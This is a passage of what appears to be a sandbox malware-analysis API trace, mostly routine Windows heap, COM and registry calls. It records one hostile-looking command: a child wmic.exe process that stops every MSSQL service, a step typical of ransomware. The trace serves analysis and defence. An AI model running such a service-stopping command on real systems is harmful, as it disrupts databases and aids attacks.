MemoryPointer=0x3b5bb0) returned 0x20 [0240.172] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5bb0 | out: hHeap=0x3a0000) returned 1 [0240.172] GetProcessHeap () returned 0x3a0000 [0240.172] GetProcessHeap () returned 0x3a0000 [0240.172] HeapValidate (hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bb990) returned 1 [0240.172] GetProcessHeap () returned 0x3a0000 [0240.172] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3bb990) returned 0x50 [0240.172] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bb990 | out: hHeap=0x3a0000) returned 1 [0240.173] GetProcessHeap () returned 0x3a0000 [0240.173] GetProcessHeap () returned 0x3a0000 [0240.173] HeapValidate (hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5a00) returned 1 [0240.173] GetProcessHeap () returned 0x3a0000 [0240.173] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b5a00) returned 0x20 [0240.173] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5a00 | out: hHeap=0x3a0000) returned 1 [0240.173] GetProcessHeap () returned 0x3a0000 [0240.173] GetProcessHeap () returned 0x3a0000 [0240.173] HeapValidate (hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5a30) returned 1 [0240.173] GetProcessHeap () returned 0x3a0000 [0240.173] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b5a30) returned 0x20 [0240.173] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5a30 | out: hHeap=0x3a0000) returned 1 [0240.173] GetProcessHeap () returned 0x3a0000 [0240.173] GetProcessHeap () returned 0x3a0000 [0240.173] HeapValidate (hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5a60) returned 1 [0240.173] GetProcessHeap () returned 0x3a0000 [0240.173] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b5a60) returned 0x20 [0240.173] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5a60 | out: hHeap=0x3a0000) returned 1 [0240.173] GetProcessHeap () returned 0x3a0000 [0240.173] GetProcessHeap () returned 0x3a0000 [0240.173] HeapValidate (hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5a90) returned 1 [0240.173] GetProcessHeap () returned 0x3a0000 [0240.173] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b5a90) returned 0x20 [0240.173] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5a90 | out: hHeap=0x3a0000) returned 1 [0240.173] GetProcessHeap () returned 0x3a0000 [0240.173] GetProcessHeap () returned 0x3a0000 [0240.173] HeapValidate (hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bb660) returned 1 [0240.173] GetProcessHeap () returned 0x3a0000 [0240.173] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3bb660) returned 0x18 [0240.173] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bb660 | out: hHeap=0x3a0000) returned 1 [0240.174] GetProcessHeap () returned 0x3a0000 [0240.174] GetProcessHeap () returned 0x3a0000 [0240.174] HeapValidate (hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5ac0) returned 1 [0240.174] GetProcessHeap () returned 0x3a0000 [0240.174] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b5ac0) returned 0x20 [0240.174] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5ac0 | out: hHeap=0x3a0000) returned 1 [0240.174] GetProcessHeap () returned 0x3a0000 [0240.174] GetProcessHeap () returned 0x3a0000 [0240.174] HeapValidate (hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5af0) returned 1 [0240.174] GetProcessHeap () returned 0x3a0000 [0240.174] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b5af0) returned 0x20 [0240.174] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5af0 | out: hHeap=0x3a0000) returned 1 [0240.174] GetProcessHeap () returned 0x3a0000 [0240.174] GetProcessHeap () returned 0x3a0000 [0240.174] HeapValidate (hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5b20) returned 1 [0240.174] GetProcessHeap () returned 0x3a0000 [0240.174] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b5b20) returned 0x20 [0240.174] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5b20 | out: hHeap=0x3a0000) returned 1 [0240.174] GetProcessHeap () returned 0x3a0000 [0240.174] GetProcessHeap () returned 0x3a0000 [0240.174] HeapValidate (hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5b50) returned 1 [0240.174] GetProcessHeap () returned 0x3a0000 [0240.174] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b5b50) returned 0x20 [0240.174] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5b50 | out: hHeap=0x3a0000) returned 1 [0240.174] GetProcessHeap () returned 0x3a0000 [0240.174] GetProcessHeap () returned 0x3a0000 [0240.174] HeapValidate (hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bb680) returned 1 [0240.174] GetProcessHeap () returned 0x3a0000 [0240.174] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3bb680) returned 0x18 [0240.174] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bb680 | out: hHeap=0x3a0000) returned 1 [0240.175] GetProcessHeap () returned 0x3a0000 [0240.175] GetProcessHeap () returned 0x3a0000 [0240.175] HeapValidate (hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5b80) returned 1 [0240.175] GetProcessHeap () returned 0x3a0000 [0240.175] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b5b80) returned 0x20 [0240.175] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5b80 | out: hHeap=0x3a0000) returned 1 [0240.175] GetProcessHeap () returned 0x3a0000 [0240.175] GetProcessHeap () returned 0x3a0000 [0240.175] HeapValidate (hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5c10) returned 1 [0240.175] GetProcessHeap () returned 0x3a0000 [0240.175] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b5c10) returned 0x20 [0240.175] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5c10 | out: hHeap=0x3a0000) returned 1 [0240.175] GetProcessHeap () returned 0x3a0000 [0240.175] GetProcessHeap () returned 0x3a0000 [0240.175] HeapValidate (hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bb6a0) returned 1 [0240.175] GetProcessHeap () returned 0x3a0000 [0240.175] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3bb6a0) returned 0x18 [0240.175] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bb6a0 | out: hHeap=0x3a0000) returned 1 [0240.175] GetProcessHeap () returned 0x3a0000 [0240.175] GetProcessHeap () returned 0x3a0000 [0240.175] HeapValidate (hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5c40) returned 1 [0240.175] GetProcessHeap () returned 0x3a0000 [0240.175] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b5c40) returned 0x20 [0240.175] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5c40 | out: hHeap=0x3a0000) returned 1 [0240.175] GetProcessHeap () returned 0x3a0000 [0240.175] GetProcessHeap () returned 0x3a0000 [0240.175] HeapValidate (hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bb620) returned 1 [0240.175] GetProcessHeap () returned 0x3a0000 [0240.176] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3bb620) returned 0x18 [0240.176] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bb620 | out: hHeap=0x3a0000) returned 1 [0240.176] exit (_Code=0) Process: id = "15" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x16add000" os_pid = "0xb30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x860" cmd_line = "\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 125 os_tid = 0xb2c [0240.333] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af930 | out: lpSystemTimeAsFileTime=0x1af930*(dwLowDateTime=0xa50b0fc0, dwHighDateTime=0x1d61d49)) [0240.333] GetCurrentProcessId () returned 0xb30 [0240.333] GetCurrentThreadId () returned 0xb2c [0240.333] GetTickCount () returned 0x1165f02 [0240.333] QueryPerformanceCounter (in: lpPerformanceCount=0x1af938 | out: lpPerformanceCount=0x1af938*=36050672113) returned 1 [0240.337] GetModuleHandleW (lpModuleName=0x0) returned 0xff260000 [0240.337] __set_app_type (_Type=0x1) [0240.337] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff2aced0) returned 0x0 [0240.337] __wgetmainargs (in: _Argc=0xff2d2380, _Argv=0xff2d2390, _Env=0xff2d2388, _DoWildCard=0, _StartInfo=0xff2d239c | out: _Argc=0xff2d2380, _Argv=0xff2d2390, _Env=0xff2d2388) returned 0 [0240.338] ??0CHString@@QEAA@XZ () returned 0xff2d2ab0 [0240.338] malloc (_Size=0x30) returned 0x435a80 [0240.338] malloc (_Size=0x70) returned 0x437d90 [0240.338] malloc (_Size=0x50) returned 0x435ac0 [0240.338] malloc (_Size=0x30) returned 0x437e10 [0240.338] malloc (_Size=0x48) returned 0x437e50 [0240.338] malloc (_Size=0x30) returned 0x437ea0 [0240.338] malloc (_Size=0x30) returned 0x437ee0 [0240.338] ??0CHString@@QEAA@XZ () returned 0xff2d2f58 [0240.338] malloc (_Size=0x30) returned 0x437f20 [0240.338] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0240.339] SetConsoleCtrlHandler (HandlerRoutine=0xff2a5724, Add=1) returned 1 [0240.339] _onexit (_Func=0xff2bf378) returned 0xff2bf378 [0240.339] _onexit (_Func=0xff2bf490) returned 0xff2bf490 [0240.339] _onexit (_Func=0xff2bf4d0) returned 0xff2bf4d0 [0240.339] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0240.339] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0240.344] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0240.355] CoCreateInstance (in: rclsid=0xff2673a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff267370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff2d2940 | out: ppv=0xff2d2940*=0x1e41390) returned 0x0 [0240.367] GetCurrentProcess () returned 0xffffffffffffffff [0240.367] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x1af700 | out: TokenHandle=0x1af700*=0xf4) returned 1 [0240.367] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1af6f8 | out: TokenInformation=0x0, ReturnLength=0x1af6f8) returned 0 [0240.367] malloc (_Size=0x118) returned 0x436970 [0240.367] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x436970, TokenInformationLength=0x118, ReturnLength=0x1af6f8 | out: TokenInformation=0x436970, ReturnLength=0x1af6f8) returned 1 [0240.367] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x436970*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1270724724, Attributes=0xa64f), (Luid.LowPart=0x0, Luid.HighPart=4423520, Attributes=0x0), (Luid.LowPart=0x690057, Luid.HighPart=6553710, Attributes=0x77006f), (Luid.LowPart=0x790053, Luid.HighPart=7602291, Attributes=0x6d0065), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x6f0050, Luid.HighPart=6619255, Attributes=0x530072))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0240.367] free (_Block=0x436970) [0240.367] CloseHandle (hObject=0xf4) returned 1 [0240.367] malloc (_Size=0x40) returned 0x437f60 [0240.367] malloc (_Size=0x40) returned 0x436970 [0240.367] malloc (_Size=0x40) returned 0x4369c0 [0240.368] malloc (_Size=0x20a) returned 0x436a10 [0240.368] GetSystemDirectoryW (in: lpBuffer=0x436a10, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0240.368] free (_Block=0x436a10) [0240.368] malloc (_Size=0x18) returned 0x437fb0 [0240.368] malloc (_Size=0x18) returned 0x436a10 [0240.368] malloc (_Size=0x18) returned 0x436a30 [0240.368] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0240.368] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0240.368] free (_Block=0x437fb0) [0240.368] free (_Block=0x436a10) [0240.368] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0240.368] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0240.369] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0240.369] FreeLibrary (hLibModule=0x77940000) returned 1 [0240.369] free (_Block=0x436a30) [0240.369] _vsnwprintf (in: _Buffer=0x4369c0, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x1af328 | out: _Buffer="ms_409") returned 6 [0240.369] malloc (_Size=0x20) returned 0x436a10 [0240.369] GetComputerNameW (in: lpBuffer=0x436a10, nSize=0x1af700 | out: lpBuffer="XDUWTFONO", nSize=0x1af700) returned 1 [0240.370] lstrlenW (lpString="XDUWTFONO") returned 9 [0240.370] malloc (_Size=0x14) returned 0x437fb0 [0240.370] lstrlenW (lpString="XDUWTFONO") returned 9 [0240.370] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x1af6f8 | out: lpNameBuffer=0x0, nSize=0x1af6f8) returned 0x7fffffdd000 [0240.371] GetLastError () returned 0xea [0240.371] malloc (_Size=0x40) returned 0x436a40 [0240.371] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x436a40, nSize=0x1af6f8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1af6f8) returned 0x1 [0240.371] lstrlenW (lpString="") returned 0 [0240.371] lstrlenW (lpString="XDUWTFONO") returned 9 [0240.371] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0240.374] lstrlenW (lpString=".") returned 1 [0240.374] lstrlenW (lpString="XDUWTFONO") returned 9 [0240.374] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0240.374] lstrlenW (lpString="LOCALHOST") returned 9 [0240.374] lstrlenW (lpString="XDUWTFONO") returned 9 [0240.374] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0240.374] lstrlenW (lpString="XDUWTFONO") returned 9 [0240.374] lstrlenW (lpString="XDUWTFONO") returned 9 [0240.374] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0240.374] free (_Block=0x437fb0) [0240.374] lstrlenW (lpString="XDUWTFONO") returned 9 [0240.374] malloc (_Size=0x14) returned 0x437fb0 [0240.374] lstrlenW (lpString="XDUWTFONO") returned 9 [0240.374] lstrlenW (lpString="XDUWTFONO") returned 9 [0240.374] malloc (_Size=0x14) returned 0x436a90 [0240.374] lstrlenW (lpString="XDUWTFONO") returned 9 [0240.374] malloc (_Size=0x8) returned 0x436ab0 [0240.374] malloc (_Size=0x18) returned 0x436ad0 [0240.375] malloc (_Size=0x30) returned 0x436af0 [0240.375] malloc (_Size=0x18) returned 0x436b30 [0240.375] SysStringLen (param_1="IDENTIFY") returned 0x8 [0240.375] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0240.375] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0240.375] SysStringLen (param_1="IDENTIFY") returned 0x8 [0240.375] malloc (_Size=0x30) returned 0x436b50 [0240.375] malloc (_Size=0x18) returned 0x436b90 [0240.375] SysStringLen (param_1="IMPERSONATE") returned 0xb [0240.375] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0240.375] SysStringLen (param_1="IMPERSONATE") returned 0xb [0240.375] SysStringLen (param_1="IDENTIFY") returned 0x8 [0240.375] SysStringLen (param_1="IDENTIFY") returned 0x8 [0240.375] SysStringLen (param_1="IMPERSONATE") returned 0xb [0240.375] malloc (_Size=0x30) returned 0x436bb0 [0240.375] malloc (_Size=0x18) returned 0x436bf0 [0240.375] SysStringLen (param_1="DELEGATE") returned 0x8 [0240.375] SysStringLen (param_1="IDENTIFY") returned 0x8 [0240.375] SysStringLen (param_1="DELEGATE") returned 0x8 [0240.375] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0240.375] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0240.375] SysStringLen (param_1="DELEGATE") returned 0x8 [0240.375] malloc (_Size=0x30) returned 0x436c10 [0240.375] malloc (_Size=0x18) returned 0x436c50 [0240.375] malloc (_Size=0x30) returned 0x436c70 [0240.376] malloc (_Size=0x18) returned 0x436cb0 [0240.376] SysStringLen (param_1="NONE") returned 0x4 [0240.376] SysStringLen (param_1="DEFAULT") returned 0x7 [0240.376] SysStringLen (param_1="DEFAULT") returned 0x7 [0240.376] SysStringLen (param_1="NONE") returned 0x4 [0240.376] malloc (_Size=0x30) returned 0x436cd0 [0240.376] malloc (_Size=0x18) returned 0x436d10 [0240.376] SysStringLen (param_1="CONNECT") returned 0x7 [0240.376] SysStringLen (param_1="DEFAULT") returned 0x7 [0240.376] malloc (_Size=0x30) returned 0x436d30 [0240.376] malloc (_Size=0x18) returned 0x436d70 [0240.376] SysStringLen (param_1="CALL") returned 0x4 [0240.376] SysStringLen (param_1="DEFAULT") returned 0x7 [0240.376] SysStringLen (param_1="CALL") returned 0x4 [0240.376] SysStringLen (param_1="CONNECT") returned 0x7 [0240.376] malloc (_Size=0x30) returned 0x436d90 [0240.376] malloc (_Size=0x18) returned 0x436dd0 [0240.376] SysStringLen (param_1="PKT") returned 0x3 [0240.376] SysStringLen (param_1="DEFAULT") returned 0x7 [0240.376] SysStringLen (param_1="PKT") returned 0x3 [0240.376] SysStringLen (param_1="NONE") returned 0x4 [0240.376] SysStringLen (param_1="NONE") returned 0x4 [0240.376] SysStringLen (param_1="PKT") returned 0x3 [0240.376] malloc (_Size=0x30) returned 0x436df0 [0240.377] malloc (_Size=0x18) returned 0x436e30 [0240.377] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0240.377] SysStringLen (param_1="DEFAULT") returned 0x7 [0240.377] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0240.377] SysStringLen (param_1="NONE") returned 0x4 [0240.377] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0240.377] SysStringLen (param_1="PKT") returned 0x3 [0240.377] SysStringLen (param_1="PKT") returned 0x3 [0240.377] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0240.377] malloc (_Size=0x30) returned 0x438000 [0240.378] malloc (_Size=0x18) returned 0x436e50 [0240.378] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0240.378] SysStringLen (param_1="DEFAULT") returned 0x7 [0240.378] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0240.378] SysStringLen (param_1="PKT") returned 0x3 [0240.378] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0240.378] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0240.378] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0240.378] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0240.378] malloc (_Size=0x30) returned 0x438040 [0240.378] malloc (_Size=0x40) returned 0x436e70 [0240.378] malloc (_Size=0x20a) returned 0x436ec0 [0240.378] GetSystemDirectoryW (in: lpBuffer=0x436ec0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0240.378] free (_Block=0x436ec0) [0240.378] malloc (_Size=0x18) returned 0x436ec0 [0240.378] malloc (_Size=0x18) returned 0x436ee0 [0240.378] malloc (_Size=0x18) returned 0x436f00 [0240.378] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0240.378] SysStringLen (param_1="\\wbem\\") returned 0x6 [0240.378] free (_Block=0x436ec0) [0240.378] free (_Block=0x436ee0) [0240.379] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0240.379] free (_Block=0x436f00) [0240.379] malloc (_Size=0x18) returned 0x436ec0 [0240.379] malloc (_Size=0x18) returned 0x436ee0 [0240.379] malloc (_Size=0x18) returned 0x436f00 [0240.379] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0240.379] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0240.379] free (_Block=0x436ec0) [0240.379] free (_Block=0x436ee0) [0240.379] GetCurrentThreadId () returned 0xb2c [0240.379] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x1af000 | out: phkResult=0x1af000*=0xf8) returned 0x0 [0240.379] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x1af050, lpcbData=0x1aeff0*=0x400 | out: lpType=0x0, lpData=0x1af050*=0x30, lpcbData=0x1aeff0*=0x4) returned 0x0 [0240.379] _wcsicmp (_String1="0", _String2="1") returned -1 [0240.379] _wcsicmp (_String1="0", _String2="2") returned -2 [0240.379] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1aeff0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x1aeff0*=0x42) returned 0x0 [0240.380] malloc (_Size=0x86) returned 0x436f20 [0240.380] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x436f20, lpcbData=0x1aeff0*=0x42 | out: lpType=0x0, lpData=0x436f20*=0x25, lpcbData=0x1aeff0*=0x42) returned 0x0 [0240.380] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0240.380] malloc (_Size=0x42) returned 0x436fb0 [0240.380] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0240.380] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x1af050, lpcbData=0x1aeff0*=0x400 | out: lpType=0x0, lpData=0x1af050*=0x36, lpcbData=0x1aeff0*=0xc) returned 0x0 [0240.380] _wtol (_String="65536") returned 65536 [0240.380] free (_Block=0x436f20) [0240.380] RegCloseKey (hKey=0x0) returned 0x6 [0240.380] CoCreateInstance (in: rclsid=0xff267410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff2673f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x1af4f8 | out: ppv=0x1af4f8*=0x1b671d0) returned 0x0 [0240.403] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x1b671d0, xmlSource=0x1af640*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x436ec0), isSuccessful=0x1af6b0 | out: isSuccessful=0x1af6b0*=0xffff) returned 0x0 [0240.570] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x1b671d0, DOMElement=0x1af4f0 | out: DOMElement=0x1af4f0*=0x1b6bc50) returned 0x0 [0240.571] malloc (_Size=0x18) returned 0x436ec0 [0240.571] IXMLDOMElement:getElementsByTagName (in: This=0x1b6bc50, tagName="XSLFORMAT", resultList=0x1af500 | out: resultList=0x1af500*=0x1b69cc0) returned 0x0 [0240.572] free (_Block=0x436ec0) [0240.572] IXMLDOMNodeList:get_length (in: This=0x1b69cc0, listLength=0x1af6c8 | out: listLength=0x1af6c8*=21) returned 0x0 [0240.572] IXMLDOMNodeList:get_item (in: This=0x1b69cc0, index=0, listItem=0x1af4d0 | out: listItem=0x1af4d0*=0x1b6bd50) returned 0x0 [0240.573] IXMLDOMNode:get_text (in: This=0x1b6bd50, text=0x1af4e0 | out: text=0x1af4e0*="texttable.xsl") returned 0x0 [0240.573] IXMLDOMNode:get_attributes (in: This=0x1b6bd50, attributeMap=0x1af4d8 | out: attributeMap=0x1af4d8*=0x1b678d0) returned 0x0 [0240.573] malloc (_Size=0x18) returned 0x436ec0 [0240.573] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b678d0, name="KEYWORD", namedItem=0x1af4e8 | out: namedItem=0x1af4e8*=0x1b6a280) returned 0x0 [0240.573] free (_Block=0x436ec0) [0240.573] IXMLDOMNode:get_nodeValue (in: This=0x1b6a280, value=0x1af520 | out: value=0x1af520*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x4)) returned 0x0 [0240.574] malloc (_Size=0x18) returned 0x436ec0 [0240.574] malloc (_Size=0x18) returned 0x436ee0 [0240.574] malloc (_Size=0x30) returned 0x438080 [0240.574] IUnknown:Release (This=0x1b6bd50) returned 0x0 [0240.574] IUnknown:Release (This=0x1b678d0) returned 0x0 [0240.574] IUnknown:Release (This=0x1b6a280) returned 0x0 [0240.574] IXMLDOMNodeList:get_item (in: This=0x1b69cc0, index=1, listItem=0x1af4d0 | out: listItem=0x1af4d0*=0x1b6bd50) returned 0x0 [0240.574] IXMLDOMNode:get_text (in: This=0x1b6bd50, text=0x1af4e0 | out: text=0x1af4e0*="textvaluelist.xsl") returned 0x0 [0240.574] IXMLDOMNode:get_attributes (in: This=0x1b6bd50, attributeMap=0x1af4d8 | out: attributeMap=0x1af4d8*=0x1b678d0) returned 0x0 [0240.574] malloc (_Size=0x18) returned 0x437110 [0240.574] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b678d0, name="KEYWORD", 